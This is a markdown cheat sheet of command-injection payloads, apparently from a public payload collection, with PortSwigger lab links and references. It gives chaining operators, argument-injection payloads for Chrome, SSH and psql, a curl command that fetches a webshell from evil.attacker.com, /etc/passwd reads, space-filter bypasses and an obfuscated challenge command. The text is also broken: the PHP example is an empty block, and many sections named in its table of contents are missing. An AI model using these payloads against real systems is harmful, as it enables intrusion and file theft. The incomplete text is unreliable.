# Command Injection > Command injection is a security vulnerability that allows an attacker to execute arbitrary commands inside a vulnerable application. ## Summary * [Tools](#tools) * [Exploits](#exploits) * [Basic commands](#basic-commands) * [Chaining commands](#chaining-commands) * [Argument injection](#argument-injection) * [Inside a command](#inside-a-command) * [Filter Bypasses](#filter-bypasses) * [Bypass without space](#bypass-without-space) * [Bypass with a line return](#bypass-with-a-line-return) * [Bypass with backslash newline](#bypass-with-backslash-newline) * [Bypass characters filter via hex encoding](#bypass-characters-filter-via-hex-encoding) * [Bypass with Tilde expansion](#bypass-with-tilde-expansion) * [Bypass with Brace expansion](#bypass-with-brace-expansion) * [Bypass characters filter](#bypass-characters-filter) * [Bypass blacklisted words](#bypass-blacklisted-words) * [Bypass with single quote](#bypass-with-single-quote) * [Bypass with double quote](#bypass-with-double-quote) * [Bypass with backticks](#bypass-with-backticks) * [Bypass with backslash and slash](#bypass-with-backslash-and-slash) * [Bypass with $@](#bypass-with-) * [Bypass with $()](#bypass-with--1) * [Bypass with variable expansion](#bypass-with-variable-expansion) * [Bypass with wildcards](#bypass-with-wildcards) * [Data Exfiltration](#data-exfiltration) * [Time based data exfiltration](#time-based-data-exfiltration) * [DNS based data exfiltration](#dns-based-data-exfiltration) * [Polyglot Command Injection](#polyglot-command-injection) * [Tricks](#tricks) * [Backgrounding long running commands](#backgrounding-long-running-commands) * [Remove arguments after the injection](#remove-arguments-after-the-injection) * [Labs](#labs) * [Challenge](#challenge) * [References](#references) ## Tools * [commixproject/commix](https://github.com/commixproject/commix) - Automated All-in-One OS command injection and exploitation tool * [projectdiscovery/interactsh](https://github.com/projectdiscovery/interactsh) - An OOB interaction gathering server and client library ## Exploits Command injection, also known as shell injection, is a type of attack in which the attacker can execute arbitrary commands on the host operating system via a vulnerable application. This vulnerability can exist when an application passes unsafe user-supplied data (forms, cookies, HTTP headers, etc.) to a system shell. In this context, the system shell is a command-line interface that processes commands to be executed, typically on a Unix or Linux system. The danger of command injection is that it can allow an attacker to execute any command on the system, potentially leading to full system compromise. **Example of Command Injection with PHP**: Suppose you have a PHP script that takes a user input to ping a specified IP address or domain: ```php ``` In the above code, the PHP script uses the `system()` function to execute the `ping` command with the IP address or domain provided by the user through the `ip` GET parameter. If an attacker provides input like `8.8.8.8; cat /etc/passwd`, the actual command that gets executed would be: `ping -c 4 8.8.8.8; cat /etc/passwd`. This means the system would first `ping 8.8.8.8` and then execute the `cat /etc/passwd` command, which would display the contents of the `/etc/passwd` file, potentially revealing sensitive information. ### Basic commands Execute the command and voila :p ```powershell cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh ... ``` ### Chaining commands In many command-line interfaces, especially Unix-like systems, there are several characters that can be used to chain or manipulate commands. * `;` (Semicolon): Allows you to execute multiple commands sequentially. * `&&` (AND): Execute the second command only if the first command succeeds (returns a zero exit status). * `||` (OR): Execute the second command only if the first command fails (returns a non-zero exit status). * `&` (Background): Execute the command in the background, allowing the user to continue using the shell. * `|` (Pipe): Takes the output of the first command and uses it as the input for the second command. ```powershell command1; command2 # Execute command1 and then command2 command1 && command2 # Execute command2 only if command1 succeeds command1 || command2 # Execute command2 only if command1 fails command1 & command2 # Execute command1 in the background command1 | command2 # Pipe the output of command1 into command2 ``` ### Argument Injection Gain a command execution when you can only append arguments to an existing command. Use this website [Argument Injection Vectors - Sonar](https://sonarsource.github.io/argument-injection-vectors/) to find the argument to inject to gain command execution. * Chrome ```ps1 chrome '--gpu-launcher="id>/tmp/foo"' ``` * SSH ```ps1 ssh '-oProxyCommand="touch /tmp/foo"' foo@foo ``` * psql ```ps1 psql -o'|id>/tmp/foo' ``` Sometimes, direct command execution from the injection might not be possible, but you may be able to redirect the flow into a specific file, enabling you to deploy a web shell. * curl ```ps1 # -o, --output Write to file instead of stdout curl http://evil.attacker.com/ -o webshell.php ``` ### Inside a command * Command injection using backticks. ```bash original_cmd_by_server `cat /etc/passwd` ``` * Command injection using substitution ```bash original_cmd_by_server $(cat /etc/passwd) ``` ## Filter Bypasses ### Bypass without space * `$IFS` is a special shell variable called the Internal Field Separator. By default, in many shells, it contains whitespace characters (space, tab, newline). When used in a command, the shell will interpret `$IFS` as a space. `$IFS` does not directly work as a separator in commands like `ls`, `wget`; use `${IFS}` instead. ```powershell cat${IFS}/etc/passwd ls${IFS}-la ``` * In some shells, brace expansion generates arbitrary strings. When executed, the shell will treat the items inside the braces as separate commands or arguments. ```powershell {cat,/etc/passwd} ``` * Input redirection. The < character tells the shell to read the contents of the file specified. ```powershell cat /dev/null & ``` ### Remove arguments after the injection In Unix-like command-line interfaces, the `--` symbol is used to signify the end of command options. After `--`, all arguments are treated as filenames and arguments, and not as options. ## Labs * [PortSwigger - OS command injection, simple case](https://portswigger.net/web-security/os-command-injection/lab-simple) * [PortSwigger - Blind OS command injection with time delays](https://portswigger.net/web-security/os-command-injection/lab-blind-time-delays) * [PortSwigger - Blind OS command injection with output redirection](https://portswigger.net/web-security/os-command-injection/lab-blind-output-redirection) * [PortSwigger - Blind OS command injection with out-of-band interaction](https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band) * [PortSwigger - Blind OS command injection with out-of-band data exfiltration](https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band-data-exfiltration) ### Challenge Challenge based on the previous tricks, what does the following command do: ```powershell g="/e"\h"hh"/hm"t"c/\i"sh"hh/hmsu\e;tac$@<${g//hh??hm/} ``` **NOTE**: The command is safe to run, but you should not trust me. ## References - [Argument Injection and Getting Past Shellwords.escape - Etienne Stalmans - November 24, 2019](https://staaldraad.github.io/post/2019-11-24-argument-injection/) - [Argument Injection Vectors - SonarSource - February 21, 2023](https://sonarsource.github.io/argument-injection-vectors/) - [Back to the Future: Unix Wildcards Gone Wild - Leon Juranic - June 25, 2014](https://www.exploit-db.com/papers/33930) - [Bash Obfuscation by String Manipulation - Malwrologist, @DissectMalware - August 4, 2018](https://twitter.com/DissectMalware/status/1025604382644232192) - [Bug Bounty Survey - Windows RCE Spaceless - Bug Bounties Survey - May 4, 2017](https://web.archive.org/web/20180808181450/https://twitter.com/bugbsurveys/status/860102244171227136) - [No PHP, No Spaces, No $, No {}, Bash Only - Sven Morgenroth - August 9, 2017](https://twitter.com/asdizzle_/status/895244943526170628) - [OS Command Injection - PortSwigger - 2024](https://portswigger.net/web-security/os-command-injection) - [SECURITY CAFÉ - Exploiting Timed-Based RCE - Pobereznicenco Dan - February 28, 2017](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/) - [TL;DR: How to Exploit/Bypass/Use PHP escapeshellarg/escapeshellcmd Functions - kacperszurek - April 25, 2018](https://github.com/kacperszurek/exploits/blob/master/GitList/exploit-bypass-php-escapeshellarg-escapeshellcmd.md)